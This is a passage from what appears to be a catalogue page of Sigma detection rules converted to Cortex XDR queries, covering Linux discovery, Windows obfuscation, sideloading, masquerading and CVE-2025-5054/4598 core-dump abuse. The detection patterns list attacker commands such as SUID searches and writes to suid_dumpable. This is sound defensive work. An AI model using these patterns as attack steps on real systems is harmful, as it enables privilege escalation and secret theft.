
Palo Alto Cortex XDR

559 rules · Sigma detections in Palo Alto Cortex XDR syntax
The same Sigma detection corpus, machine-rendered into Palo Alto Cortex XDR query syntax and ready to paste. Switch platforms above for identical coverage in another language, or choose Sigma (generic) for the portable YAML.
Filter by technique (pick techniques from the ATT&CK matrix); rule counts per tactic:
Reconnaissance: 4
Resource Development: 5
Initial Access: 7
Execution: 25
Persistence: 31
Privilege Escalation: 17
Stealth: 63
Defense Impairment: 16
Credential Access: 26
Discovery: 24
Lateral Movement: 10
Collection: 11
Command and Control: 18
Exfiltration: 7
Impact: 10
Using these Sigma rules
Deploy. Pick your SIEM above and paste the rendered query straight into a saved search or detection rule, or expand any rule to convert its generic YAML inline to the language you run.
Adapt. Map the field names to your log schema - Sigma assumes a normalised taxonomy - and tune thresholds and timeframes to your own baseline before you trust the alert.
Validate. Every rule is mapped to ATT&CK, so run the matching Atomic Red Team test on /atomic to confirm the rule actually fires before you rely on it.
Judge. Each rule shows a quality tier (Strong / Moderate / Basic) and an estimated alert-volume tier (Low / Medium / High FP), both scored deterministically from the rule's shape - status, detection depth, match breadth, log source, documented false positives and references. A rule existing is not the same as a rule being good, or being quiet; hover either tier for the breakdown. The FP estimate reads rule shape, not a measured rate, so use it to pick what to tune first before you deploy.

Detection rules

50 shown of 559
level: medium · quality: Moderate · alert volume: Medium FP
Potential Discovery Activity Using Find - Linux
Detects usage of "find" binary in a suspicious manner to perform discovery
status: test · author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: technique · id: 8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_LINUX and 
 (action_process_image_path contains "/find" and 
 (action_process_image_command_line in ("*-perm -4000*", "*-perm -2000*", "*-perm 0777*", "*-perm -222*", "*-perm -o w*", "*-perm -o x*", "*-perm -u=s*", "*-perm -g=s*"))))
Sigma YAML
title: Potential Discovery Activity Using Find - Linux
id: 8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf
related:
    - id: 85de3a19-b675-4a51-bfc6-b11a5186c971
      type: similar
status: test
description: Detects usage of "find" binary in a suspicious manner to perform discovery
references:
    - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-28
tags:
    - attack.discovery
    - attack.t1083
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|endswith: '/find'
        CommandLine|contains:
            - '-perm -4000'
            - '-perm -2000'
            - '-perm 0777'
            - '-perm -222'
            - '-perm -o w'
            - '-perm -o x'
            - '-perm -u=s'
            - '-perm -g=s'
    condition: selection
falsepositives:
    - Unknown
level: medium
level: medium · quality: Moderate · alert volume: Medium FP
Potential Discovery Activity Using Find - MacOS
Detects usage of "find" binary in a suspicious manner to perform discovery
status: test · author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: technique · id: 85de3a19-b675-4a51-bfc6-b11a5186c971
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_MAC and 
 (action_process_image_path contains "/find" and 
 (action_process_image_command_line in ("*-perm -4000*", "*-perm -2000*", "*-perm 0777*", "*-perm -222*", "*-perm -o w*", "*-perm -o x*", "*-perm -u=s*", "*-perm -g=s*"))))
Sigma YAML
title: Potential Discovery Activity Using Find - MacOS
id: 85de3a19-b675-4a51-bfc6-b11a5186c971
related:
    - id: 8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf
      type: similar
status: test
description: Detects usage of "find" binary in a suspicious manner to perform discovery
references:
    - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-28
tags:
    - attack.discovery
    - attack.t1083
logsource:
    category: process_creation
    product: macos
detection:
    selection:
        Image|endswith: '/find'
        CommandLine|contains:
            - '-perm -4000'
            - '-perm -2000'
            - '-perm 0777'
            - '-perm -222'
            - '-perm -o w'
            - '-perm -o x'
            - '-perm -u=s'
            - '-perm -g=s'
    condition: selection
falsepositives:
    - Unknown
level: medium
level: medium · quality: Strong · alert volume: High FP
Potential Discovery Activity Via Dnscmd.EXE
Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones are used to host the DNS records for a particular domain.
status: test · author: @gott_cyber · ATT&CK mapping: tactic-only · id: b6457d63-d2a2-4e29-859d-4e7affc153d1
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_process_image_path contains "\dnscmd.exe" and 
 (action_process_image_command_line in ("*/enumrecords*", "*/enumzones*", "*/ZonePrint*", "*/info*"))))
Sigma YAML
title: Potential Discovery Activity Via Dnscmd.EXE
id: b6457d63-d2a2-4e29-859d-4e7affc153d1
status: test
description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones are used to host the DNS records for a particular domain.
references:
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd
    - https://learn.microsoft.com/en-us/azure/dns/dns-zones-records
    - https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/
author: '@gott_cyber'
date: 2022-07-31
modified: 2023-02-04
tags:
    - attack.discovery
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith: '\dnscmd.exe'
    selection_cli:
        CommandLine|contains:
            - '/enumrecords'
            - '/enumzones'
            - '/ZonePrint'
            - '/info'
    condition: all of selection_*
falsepositives:
    - Legitimate administration use
level: medium
level: medium · quality: Moderate · alert volume: High FP
Potential Dosfuscation Activity
Detects possible payload obfuscation via the commandline
status: test · author: frack113, Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: technique · id: a77c1610-fc73-4019-8e29-0f51efc04a51
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_process_image_command_line in ("*^^*", "*^|^*", "*,;,*", "*;;;;*", "*;; ;;*", "*(,(,*", "*%COMSPEC:~*", "* c^m^d*", "*^c^m^d*", "* c^md*", "* cm^d*", "*^cm^d*", "* s^et *", "* s^e^t *", "* se^t *")))
Sigma YAML
title: Potential Dosfuscation Activity
id: a77c1610-fc73-4019-8e29-0f51efc04a51
status: test
description: Detects possible payload obfuscation via the commandline
references:
    - https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf
    - https://github.com/danielbohannon/Invoke-DOSfuscation
author: frack113, Nasreddine Bencherchali (Nextron Systems)
date: 2022-02-15
modified: 2023-03-06
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - '^^'
            - '^|^'
            - ',;,'
            - ';;;;'
            - ';; ;;'
            - '(,(,'
            - '%COMSPEC:~'
            - ' c^m^d'
            - '^c^m^d'
            - ' c^md'
            - ' cm^d'
            - '^cm^d'
            - ' s^et '
            - ' s^e^t '
            - ' se^t '
            # - '%%'
            # - '&&'
            # - '""'
    condition: selection
falsepositives:
    - Unknown
level: medium
level: medium · quality: Moderate · alert volume: High FP
Potential Download/Upload Activity Using Type Command
Detects usage of the "type" command to download/upload data from WebDAV server
status: test · author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: technique · id: aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_process_image_command_line contains "type " and 
 action_process_image_command_line contains " > \\") or 
 (action_process_image_command_line contains "type \\" and 
 action_process_image_command_line contains " > ")))
Sigma YAML
title: Potential Download/Upload Activity Using Type Command
id: aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f
status: test
description: Detects usage of the "type" command to download/upload data from WebDAV server
references:
    - https://mr0range.com/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-14
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    product: windows
    category: process_creation
detection:
    # Note: built-in CMD commands do not trigger a process creation on their own, so this would be detected only when used via a "/c" command
    selection_upload:
        CommandLine|contains|all:
            - 'type '
            - ' > \\\\'
    selection_download:
        CommandLine|contains|all:
            - 'type \\\\'
            - ' > ' # Space are added to increase atom length and speed up matching. If your backend can handle this remove the space
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: medium
level: medium · quality: Strong · alert volume: Medium FP
Potential Dropper Script Execution Via WScript/CScript/MSHTA
Detects wscript/cscript/mshta executions of scripts located in user directories
status: test · author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems), Dave Johnson · ATT&CK mapping: sub-technique · id: cea72823-df4d-4567-950c-0b579eaf0846
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_process_image_path in ("*\wscript.exe", "*\cscript.exe", "*\mshta.exe")) and 
 (action_process_image_command_line in ("*:\Perflogs\*", "*:\Temp\*", "*:\Tmp\*", "*:\Users\Public\*", "*:\Windows\Temp\*", "*\AppData\Local\Temp\*", "*\AppData\Roaming\Temp\*", "*\Start Menu\Programs\Startup\*", "*\Temporary Internet*", "*\Windows\Temp*", "*%LocalAppData%\Temp\*", "*%TEMP%*", "*%TMP%*")) and 
 (action_process_image_command_line in ("*.hta*", "*.js*", "*.jse*", "*.vba*", "*.vbe*", "*.vbs*", "*.wsf*", "*.wsh*"))))
Sigma YAML
title: Potential Dropper Script Execution Via WScript/CScript/MSHTA
id: cea72823-df4d-4567-950c-0b579eaf0846
related:
    - id: 1e33157c-53b1-41ad-bbcc-780b80b58288
      type: similar
status: test
description: Detects wscript/cscript/mshta executions of scripts located in user directories
references:
    - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/
    - https://redcanary.com/blog/gootloader/
    - https://www.microsoft.com/en-us/security/blog/2025/03/06/malvertising-campaign-leads-to-info-stealers-hosted-on-github/
author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems), Dave Johnson
date: 2019-01-16
modified: 2026-02-17
tags:
    - attack.execution
    - attack.t1059.005
    - attack.t1059.007
logsource:
    category: process_creation
    product: windows
detection:
    selection_exec:
        Image|endswith:
            - '\wscript.exe'
            - '\cscript.exe'
            - '\mshta.exe'
    selection_paths:
        CommandLine|contains:
            - ':\Perflogs\'
            - ':\Temp\'
            - ':\Tmp\'
            - ':\Users\Public\'
            - ':\Windows\Temp\'
            - '\AppData\Local\Temp\'
            - '\AppData\Roaming\Temp\'
            - '\Start Menu\Programs\Startup\'
            - '\Temporary Internet'
            - '\Windows\Temp'
            - '%LocalAppData%\Temp\'
            - '%TEMP%'
            - '%TMP%'
    selection_ext:
        CommandLine|contains:
            - '.hta'
            - '.js'
            - '.jse'
            - '.vba'
            - '.vbe'
            - '.vbs'
            - '.wsf'
            - '.wsh'
    condition: all of selection_*
falsepositives:
    - Some installers might generate a similar behavior. An initial baseline is required
level: medium
level: medium · quality: Moderate · alert volume: High FP
Potential Encrypted Registry Blob Related To SNAKE Malware
Detects the creation of a registry value in the ".wav\OpenWithProgIds" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA
status: test · author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: tactic-only · id: 7e163e96-b9a5-45d6-b2cd-d7d87b13c60b
cortex_xdr query
config case_sensitive = false | preset=xdr_registry | filter (event_type = ENUM.REGISTRY and 
 event_sub_type = ENUM.REGISTRY_SET_VALUE) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_registry_key_name contains "\SOFTWARE\Classes\.wav\OpenWithProgIds\" and 
 (not 
 (action_registry_key_name in ("*.AssocFile.WAV", "*.wav.*")))))
Sigma YAML
title: Potential Encrypted Registry Blob Related To SNAKE Malware
id: 7e163e96-b9a5-45d6-b2cd-d7d87b13c60b
status: test
description: Detects the creation of a registry value in the ".wav\OpenWithProgIds" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA
references:
    - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-10
modified: 2023-08-17
tags:
    - attack.persistence
    - detection.emerging-threats
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: '\SOFTWARE\Classes\.wav\OpenWithProgIds\'
    filter_main_wav:
        - TargetObject|endswith: '.AssocFile.WAV'
        - TargetObject|contains: '.wav.'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Some additional tuning might be required to tune out legitimate processes that write to this key by default
level: medium
level: medium · quality: Strong · alert volume: Medium FP
Potential Exploitation of CVE-2025-5054 or CVE-2025-4598
Detects attempts by an attacker to enable core dumps for set-user-ID (SUID) processes by modifying the system file /proc/sys/fs/suid_dumpable, typically by setting its value to 1 or 2. Enabling this feature allows memory dumps (core dumps) of SUID processes, which usually run with elevated privileges; these dumps may contain sensitive information such as passwords, cryptographic keys or other secrets. CVE-2025-5054: Information leak via core dumps from SUID binaries using apport. CVE-2025-4598: Information disclosure in systemd-coredump due to insecure handling of SUID process memory dumps.
status: experimental · author: Milad Cheraghi · ATT&CK mapping: technique · id: 33b3cfb1-574e-44b9-b527-fbf9303b9d7b
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_LINUX and 
 (((action_process_image_path in ("*/sbin/sysctl", "*/bin/sysctl")) and 
 action_process_image_command_line contains "fs.suid_dumpable=") or 
 ((action_process_image_path in ("*/bin/bash", "*/bin/sh")) and 
 (action_process_image_command_line in ("*echo 1 > /proc/sys/fs/suid_dumpable*", "*echo 2 > /proc/sys/fs/suid_dumpable*", "*echo 1 >/proc/sys/fs/suid_dumpable*", "*echo 2 >/proc/sys/fs/suid_dumpable*", "*echo 1> /proc/sys/fs/suid_dumpable*", "*echo 2> /proc/sys/fs/suid_dumpable*", "*echo 1>/proc/sys/fs/suid_dumpable*", "*echo 2>/proc/sys/fs/suid_dumpable*")))))
Sigma YAML
title: Potential Exploitation of CVE-2025-5054 or CVE-2025-4598
id: 33b3cfb1-574e-44b9-b527-fbf9303b9d7b
status: experimental
description: |
    Detects attempts by an attacker to enable core dumps for set-user-ID (SUID) processes by modifying the system file /proc/sys/fs/suid_dumpable, typically by setting its value to 1 or 2.
    Enabling this feature allows memory dumps (core dumps) of SUID processes, which usually run with elevated privileges.
    These dumps may contain sensitive information such as passwords, cryptographic keys or other secrets.
    CVE-2025-5054: Information leak via core dumps from SUID binaries using apport.
    CVE-2025-4598: Information disclosure in systemd-coredump due to insecure handling of SUID process memory dumps.
references:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-5054
    - https://nvd.nist.gov/vuln/detail/CVE-2025-4598
    - https://blog.qualys.com/vulnerabilities-threat-research/2025/05/29/qualys-tru-discovers-two-local-information-disclosure-vulnerabilities-in-apport-and-systemd-coredump-cve-2025-5054-and-cve-2025-4598
author: Milad Cheraghi
date: 2026-04-28
tags:
    - attack.privilege-escalation
    - attack.credential-access
    - attack.t1548
    - attack.t1003
    - cve.2025-5054
    - cve.2025-4598
    - detection.emerging-threats
logsource:
    product: linux
    category: process_creation
detection:
    selection_suid_dumpable_sysctl:
        Image|endswith:
            - '/sbin/sysctl'
            - '/bin/sysctl'
        CommandLine|contains: 'fs.suid_dumpable='
    selection_echo_proc_write:
        Image|endswith:
            - '/bin/bash'
            - '/bin/sh'
        CommandLine|contains:
            - 'echo 1 > /proc/sys/fs/suid_dumpable'
            - 'echo 2 > /proc/sys/fs/suid_dumpable'
            - 'echo 1 >/proc/sys/fs/suid_dumpable'
            - 'echo 2 >/proc/sys/fs/suid_dumpable'
            - 'echo 1> /proc/sys/fs/suid_dumpable'
            - 'echo 2> /proc/sys/fs/suid_dumpable'
            - 'echo 1>/proc/sys/fs/suid_dumpable'
            - 'echo 2>/proc/sys/fs/suid_dumpable'
    condition: 1 of selection_*
falsepositives:
    - System administrators enabling debugging temporarily
    - Legitimate crash diagnostic operations
level: medium
level: medium · quality: Moderate · alert volume: Medium FP
Potential Fake Instance Of Hxtsr.EXE Executed
HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications. HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files". Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe
status: test · author: Sreeman · ATT&CK mapping: technique · id: 4e762605-34a8-406d-b72e-c1a089313320
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_process_image_path contains "\hxtsr.exe" and 
 (not 
 (action_process_image_path contains ":\program files\windowsapps\microsoft.windowscommunicationsapps_" and 
 action_process_image_path contains "\hxtsr.exe"))))
Sigma YAML
title: Potential Fake Instance Of Hxtsr.EXE Executed
id: 4e762605-34a8-406d-b72e-c1a089313320
status: test
description: |
    HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.
    HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files".
    Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe
references:
    - Internal Research
author: Sreeman
date: 2020-04-17
modified: 2024-02-08
tags:
    - attack.stealth
    - attack.t1036
logsource:
    product: windows
    category: process_creation
detection:
    # TODO: Link this to the more generic system process rule
    selection:
        Image|endswith: '\hxtsr.exe'
    filter_main_hxtsr:
        Image|contains: ':\program files\windowsapps\microsoft.windowscommunicationsapps_'
        Image|endswith: '\hxtsr.exe'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: medium
level: medium · quality: Moderate · alert volume: High FP
Potential File Download Via MS-AppInstaller Protocol Handler
Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE. The downloaded files are temporarily stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>"
status: test · author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel · ATT&CK mapping: technique · id: 180c7c5c-d64b-4a63-86e9-68910451bc8b
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_process_image_command_line contains "ms-appinstaller://?source=" and 
 action_process_image_command_line contains "http"))
Sigma YAML
title: Potential File Download Via MS-AppInstaller Protocol Handler
id: 180c7c5c-d64b-4a63-86e9-68910451bc8b
related:
    - id: 7cff77e1-9663-46a3-8260-17f2e1aa9d0a
      type: derived
status: test
description: |
    Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE
    The downloaded files are temporarily stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>"
references:
    - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/
author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
date: 2023-11-09
tags:
    - attack.execution
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'ms-appinstaller://?source='
            - 'http'
    condition: selection
falsepositives:
    - Unknown
level: medium
level: medium · quality: Strong · alert volume: Medium FP
Potential Goopdate.DLL Sideloading
Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe
status: test · author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: sub-technique · id: b6188d2f-b3c4-4d2c-a17d-9706e0851af0
cortex_xdr query
config case_sensitive = false | preset=xdr_image_load | filter event_type = ENUM.LOAD_IMAGE and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_module_path contains "\goopdate.dll" and 
 (not 
 (action_module_path in ("C:\Program Files (x86)\*", "C:\Program Files\*"))) and 
 (not 
 (((actor_process_image_path contains "\AppData\Local\Temp\GUM" and 
 actor_process_image_path contains ".tmp\Dropbox") and 
 (action_module_path contains "\AppData\Local\Temp\GUM" and 
 action_module_path contains ".tmp\goopdate.dll")) or 
 ((actor_process_image_path in ("*\AppData\Local\Temp\GUM*", "*:\Windows\SystemTemp\GUM*")) and 
 actor_process_image_path contains ".tmp\GoogleUpdate.exe" and 
 (action_module_path in ("*\AppData\Local\Temp\GUM*", "*:\Windows\SystemTemp\GUM*")))))))
Sigma YAML
title: Potential Goopdate.DLL Sideloading
id: b6188d2f-b3c4-4d2c-a17d-9706e0851af0
status: test
description: Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe
references:
    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-15
modified: 2025-10-07
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded|endswith: '\goopdate.dll'
    filter_main_generic:
        ImageLoaded|startswith:
            # Many third party chromium based apps use this DLLs. It's better to create a baseline and add specific filters
            - 'C:\Program Files (x86)\'
            - 'C:\Program Files\'
    filter_optional_dropbox_installer_temp:
        Image|contains|all:
            - '\AppData\Local\Temp\GUM'
            - '.tmp\Dropbox'
        ImageLoaded|contains|all:
            - '\AppData\Local\Temp\GUM'
            - '.tmp\goopdate.dll'
    filter_optional_googleupdate_temp:
        Image|contains:
            - '\AppData\Local\Temp\GUM'
            - ':\Windows\SystemTemp\GUM'
        Image|endswith: '.tmp\GoogleUpdate.exe'
        ImageLoaded|contains:
            - '\AppData\Local\Temp\GUM'
            - ':\Windows\SystemTemp\GUM'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - False positives are expected from Google Chrome installations running from user locations (AppData) and other custom locations. Apply additional filters accordingly.
    - Other third party chromium browsers located in AppData
level: medium
level: medium · quality: Moderate · alert volume: High FP
Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream
Detects the creation of a hidden file or folder with the "::$index_allocation" stream, which can be used as a technique to prevent access to folders and files from tooling such as "explorer.exe" and "powershell.exe"
status: test · author: Scoubi (@ScoubiMtl) · ATT&CK mapping: sub-technique · id: a8f866e1-bdd4-425e-a27a-37619238d9c7
cortex_xdr query
config case_sensitive = false | preset=xdr_file | filter event_type = ENUM.FILE and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 action_file_name contains "::$index_allocation")
Sigma YAML
title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream
id: a8f866e1-bdd4-425e-a27a-37619238d9c7
related:
    - id: 0900463c-b33b-49a8-be1d-552a3b553dae
      type: similar
status: test
description: |
    Detects the creation of a hidden file or folder with the "::$index_allocation" stream, which can be used as a technique to prevent access to folders and files from tooling such as "explorer.exe" and "powershell.exe"
references:
    - https://twitter.com/pfiatde/status/1681977680688738305
    - https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/
    - https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/
    - https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation
    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3
author: Scoubi (@ScoubiMtl)
date: 2023-10-09
tags:
    - attack.stealth
    - attack.t1564.004
logsource:
    product: windows
    category: file_event
detection:
    selection:
        # Note: Both Sysmon and ETW are unable to log the presence of such streams in the CommandLine, but EDRs such as CrowdStrike are able to (e.g. via CMD console history). Users are advised to test this before usage
        TargetFilename|contains: '::$index_allocation'
    condition: selection
falsepositives:
    - Unlikely
level: medium
level: medium · quality: Moderate · alert volume: High FP
Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI
Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"
status: test · author: Nasreddine Bencherchali (Nextron Systems), Scoubi (@ScoubiMtl) · ATT&CK mapping: sub-technique · id: 0900463c-b33b-49a8-be1d-552a3b553dae
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 action_process_image_command_line contains "::$index_allocation")
Sigma YAML
title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI
id: 0900463c-b33b-49a8-be1d-552a3b553dae
related:
    - id: a8f866e1-bdd4-425e-a27a-37619238d9c7
      type: similar
status: test
description: |
    Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"
references:
    - https://twitter.com/pfiatde/status/1681977680688738305
    - https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/
    - https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/
    - https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation
    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3
author: Nasreddine Bencherchali (Nextron Systems), Scoubi (@ScoubiMtl)
date: 2023-10-09
tags:
    - attack.stealth
    - attack.t1564.004
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        # Note: Both Sysmon and ETW are unable to log the presence of such a stream in the CommandLine, but EDRs such as CrowdStrike are able to (e.g. via CMD console history). Users are advised to test this before usage
        CommandLine|contains: '::$index_allocation'
    condition: selection
falsepositives:
    - Unlikely
level: medium
level: medium · quality: Moderate · alert volume: High FP
Potential Homoglyph Attack Using Lookalike Characters
Detects the presence of unicode characters which are homoglyphs, i.e. identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading technique. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
status: test · author: Micah Babinski, @micahbabinski · ATT&CK mapping: sub-technique · id: 32e280f1-8ad4-46ef-9e80-910657611fbc
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_process_image_command_line in ("*А*", "*В*", "*Е*", "*К*", "*М*", "*Н*", "*О*", "*Р*", "*С*", "*Т*", "*Х*", "*Ѕ*", "*І*", "*Ј*", "*Ү*", "*Ӏ*", "*Ԍ*", "*Ԛ*", "*Ԝ*", "*Α*", "*Β*", "*Ε*", "*Ζ*", "*Η*", "*Ι*", "*Κ*", "*Μ*", "*Ν*", "*Ο*", "*Ρ*", "*Τ*", "*Υ*", "*Χ*")) or 
 (action_process_image_command_line in ("*а*", "*е*", "*о*", "*р*", "*с*", "*х*", "*ѕ*", "*і*", "*ӏ*", "*ј*", "*һ*", "*ԁ*", "*ԛ*", "*ԝ*", "*ο*"))))
Sigma YAML
title: Potential Homoglyph Attack Using Lookalike Characters
id: 32e280f1-8ad4-46ef-9e80-910657611fbc
status: test
description: |
    Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.
    This is used as an obfuscation and masquerading technique. Only "perfect" homoglyphs are included; these are characters that
    are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
references:
    - https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish
    - http://www.irongeek.com/homoglyph-attack-generator.php
author: Micah Babinski, @micahbabinski
date: 2023-05-07
tags:
    - attack.stealth
    - attack.t1036
    - attack.t1036.003
logsource:
    category: process_creation
    product: windows
detection:
    selection_upper:
        CommandLine|contains:
            - "\u0410" # А/A
            - "\u0412" # В/B
            - "\u0415" # Е/E
            - "\u041a" # К/K
            - "\u041c" # М/M
            - "\u041d" # Н/H
            - "\u041e" # О/O
            - "\u0420" # Р/P
            - "\u0421" # С/C
            - "\u0422" # Т/T
            - "\u0425" # Х/X
            - "\u0405" # Ѕ/S
            - "\u0406" # І/I
            - "\u0408" # Ј/J
            - "\u04ae" # Ү/Y
            - "\u04c0" # Ӏ/I
            - "\u050C" # Ԍ/G
            - "\u051a" # Ԛ/Q
            - "\u051c" # Ԝ/W
            - "\u0391" # Α/A
            - "\u0392" # Β/B
